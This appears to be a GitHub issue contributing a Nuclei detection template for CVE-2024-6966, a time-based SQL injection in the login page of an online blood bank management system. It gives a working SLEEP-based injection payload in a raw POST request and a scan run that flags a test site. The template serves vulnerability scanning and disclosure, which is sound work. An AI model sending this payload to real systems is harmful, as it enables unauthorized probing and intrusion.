You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
id: cve-2024-6966
info:
name: Itsourcecode Online Blood Bank Management System - Time Based SQL injection in Login Page
author: cl4irv0yance
description: In the login portal of the Online Blood Bank Management application, it is possible to inject SQL into "user" and exploit time-based SQL injection.
severity: High
reference:
- https://github.com/HermesCui/CVE/issues/1
- https://nvd.nist.gov/vuln/detail/CVE-2024-6966
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
cvss-score: 7.3
cve-id: cve-2024-6966
tags: sqli,cve,cve-2024,cve-2024-6966,itsourcecode
http:
- raw:
- |
@timeout: 25s
POST /bloodbank/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
tab=on&user=tab%3Don%26user%3D123321%27+AND+%28SELECT+8755+FROM+%28SELECT%28SLEEP%2810%29%29%29xGkg%29+AND+%27emTj%27%3D%27emTj%26pass%3D123123%26sub%3DLog+In%22&pass=test&sub=Log+In
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Username'
- 'Password'
- 'Keep me Signed in'
- 'Forgot Password'
- 'Wrong email or password'
condition: and
- type: dsl
dsl:
- 'duration>=10'
Template Results
nuclei -u https://test.site/bloodbank -t cve-2024-6966.yaml
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.2.9
projectdiscovery.io
[INF] Current nuclei version: v3.2.9 (outdated)
[INF] Current nuclei-templates version: v9.9.1 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 75
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[cve-2024-6966] [http] [high] https://test.site/bloodbank/login.php
Page Response (only including html in response - snipped css)
Hello, the response time for this issue was longer than usual because the team was traveling for DEFCON. The team will respond to this issue shortly. Thank you for your contribution
Template Information:
In the login portal of the Online Blood Bank Management application, it is possible to inject SQL into "user" and exploit time-based SQL injection.
References can be found here:
https://nvd.nist.gov/vuln/detail/CVE-2024-6966
HermesCui/CVE#1
Nuclei Template:
Template Results
Page Response (only including html in response - snipped css)
The text was updated successfully, but these errors were encountered: